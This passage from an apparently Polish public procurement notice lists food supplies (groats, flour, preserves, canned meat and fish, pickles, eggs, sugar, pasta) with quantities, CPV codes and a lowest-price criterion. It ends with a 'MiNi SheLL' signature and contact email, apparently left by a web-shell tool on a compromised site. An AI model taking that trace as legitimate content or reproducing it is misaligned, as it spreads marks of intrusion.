11.Herbata granulowana -opak. Do 5 kg,ilość 100 kg,
12.Kawa zbożowa - opakowanie do 10 kg,ilość 25 kg,
13.Sól spożywcza drobnoziarnista  jodowana - opakowanie do 10 kg,ilość 300 kg,
14.Musztarda  - opakowanie do 1 kg,ilość 300 kg,
15.Ocet spirytusowy 10%  - butelki do 1 l,ilość 40 litr,
16.Majonez - opakowanie  do 1 kg,ilość 100 kg,
17.Kwasek cytrynowy opakowanie do 2 kg,ilość 7 kg,
18.Czosnek mielony - opakowanie do 2 kg,ilość 40 kg,
19.Majeranek - opakowanie do 1 kg,ilość 5 kg,
20.Liść laurowy - opakowanie do 1 kg,ilość 1 kg,
21.Papryka ostra mielona - opakowanie do 1 kg , ilość 8 kg,
22.Pieprz prawdziwy mielony - opakowanie do 1 kg,ilość 15 kg,
23.Pieprz ziołowy- opakowanie do 1 kg,ilość 2 kg,
24.Ziele angielskie - opakowanie do 0,5 kg,ilość 0,50 kg,
25.Przyprawa do zup w płynie - opakowanie  1 litr,ilość 300 litr,
26.Cynamon mielony- opakowanie do 200 g, ilość 1 kg,
27.Kotlety z soi a la schabowe o gramaturze min 16 gr /szt.,opakowanie do 15 kg, 
ilość 80 kg,
Dostawa w.w artykułów wg. potrzeb ,średnio raz w miesiącu lub raz na dwa miesiące.Termin przydatności do spożycia od dnia dostawy:min.3 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.89.15.00-5, 15.89.14.00-4, 15.87.12.60-4, 15.86.30.00-5, 15.89.00.00-3, 15.87.24.00-5, 15.87.12.50-1, 15.87.11.10-8, 15.87.12.73-8, 15.87.00.00-7, 15.87.21.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> artykuły zbożowe,skrobiowe i przemiału ziarna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kasza jęczmienna  opak. 1-1,5 kg,ilość 700 kg,
2.Kasza manna opak. 1-1,5 kg,ilość 80 kg,
3.Mąka pszenna typ 500 opak. 1- 1,5 kg,ilość 1500 kg ,
4.Mąka ziemniaczana - opak  1-1,5 kg,ilość 100 kg, 
5.Ryż biały łuskany opak  1- 25 kg ,ilość 800 kg. 
Dostawa w.w artykułów raz na dwa miesiące. Termin przydatności do spożycia od dnia dostawy:min.3 miesiące..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.61.31.00-9, 15.61.21.00-2, 15.62.00.00-0, 15.61.41.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> warzywa przetworzone ,strączkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Dżem truskawkowy, opak od 1- 13 kg,ilość 500 kg,
2.Marmolada wieloowocowa twarda opak od 1-13 kg,ilość 650 kg,
3.Syrop owocowy zagęszczony opak do 3 litr,ilość 200 litr,
4.Koncentrat  pomidorowy 30% ,opak.  0,9 - 4,5 kg ,ilość 500 kg,
5.Kukurydza konserwowa ,waga produktu netto w opakowaniu od 200 do 500g w I gatunku 
ilość 180 kg,
6.Groszek konserwowy ,waga produktu netto w opakowaniu od 200 do 500g w I gatunku,
ilość 400 kg,
7.Sałatka szwedzka,waga produktu netto opak od 1- 4,25 kg,ilość 600 kg,
8.Fasola Jaś opak. 1- 25 kg,ilość 400 kg,
9.Groch łuszczony  połówki  opak. 1- 25 kg,ilość 200 kg,
10.Chrzan tarty ,waga netto produktu w opakowaniu od 100 do 400g w I gatunku
 ilość 30 kg
11.Szczaw konserwowy, waga netto produktu w opakowaniu szklanym  od 200g do 900g w I gatunku,ilość 60 kg,
12.Leczo pieczarkowe, waga produktu netto,opak.szklane do 4,25 kg,ilość 80 kg,
 
Dostawa w.w artykułów raz w miesiącu. Termin przydatności do spożycia od dnia dostawy:min.3 miesiące..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.22.90-3, 15.33.22.30-5, 15.32.18.00-2, 15.33.14.27-6, 15.33.14.70-2, 15.33.14.60-9, 15.33.14.00-1, 15.33.11.30-7, 15.33.11.33-8, 15.33.14.00-1, 15.33.15.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> konserwy mięsne,rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Konserwa mięsna 300 g,
Konserwa sterylizowana, niezdeformowana, z wieczkiem łatwootwieralnym, właściwie oznakowana. Skład: minimum 40 % mięso wieprzowe, tłuszcz wieprzowy, skórki wieprzowe ,
ilość 500 kg,
2.Pasztety drobiowe 300 g
Konserwa sterylizowana, niezdeformowana, z wieczkiem łatwootwieralnym, właściwie oznakowana. Skład; minimum 16 % mięso drobiowe, wątroba wieprzowa lub drobiowa minimum 10%, skórki drobiowe, tłuszcz wieprzowy. ilość 450 kg,
3.Pasztet drobiowy 100-130g opak alumin.
Konserwa sterylizowana, niezdeformowana, z wieczkiem łatwootwieralnym, właściwie oznakowana. Skład: minimum 20% mięso drobiowe, wątroba wieprzowa lub drobiowa minimum 10 %, tłuszcz wieprzowy. ilość 200 kg,
4.Konserwa rybna w pomidor. 300g do 330g,   
Konserwa z samootwieraczem, właściwie oznakowana, niezdeformowana, ilość 400 kg,
5.Konserwa rybna w pomidor. 170 g,
Konserwa z samootwieraczem, właściwie oznakowana, niezdeformowana,ilość 8 kg,
6.Paprykarz szczeciński 300 g do 330 g,
Konserwa z samootwieraczem, właściwie oznakowana, niezdeformowana,ilość 600 kg,
7.Paprykarz szczeciński 130-140 g,
Konserwa z samootwieraczem, właściwie oznakowana, niezdeformowana,ilość 10 kg,

Dostawa w.w artykułów raz na 2  miesiące. Termin przydatności do spożycia od dnia dostawy:min.12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.10.00-5, 15.13.13.00-8, 15.13.13.10-1, 15.23.50.00-4, 15.23.50.00-4, 15.24.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Ryba mrożona tusza ( bez głowy mintaj,miruna,morszczuk),
zawartość glazury do 10% ,ilość 400 kg,
2.Filet śledziowy ala matjas (opakowanie od 2 kg-4 kg),ilość 250 kg,
3.Burgery rybne  panierowane ,
Burgery rybne mrożone panierowane .Burgery jednolite o wyrównanej wielkości, całe (1 szt. 55-100 [g] masy netto),ilość 200 kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.20.00.00-6, 15.23.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> kiszonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kapusta kiszona (opakowanie beczka do 120 kg),ilość 1800 kg,
2.Ogórki kiszone (opakowanie beczka do 80 kg ),ilość 1500 kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.11.42-4, 15.33.10.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Jaja kurze- klasa świeżości A,kategoria wagowa M (od 53 do 63 g)
,jaja w wytłaczankach , pakowane w skrzynkach,kartonach po 360 szt, ilość 37000 szt,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> cukier.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cukier biały kryształ (opakowanie 1 kg lub luz),ilość 1000 kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.12.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> makaron.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Makaron bezjajeczny gruby: świderki, kolanka,rurka ,łazanki,ilość 1200 kg,
2.Makaron bezjajeczny cienki: nitki ,cienka wstążka,ilość 250 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com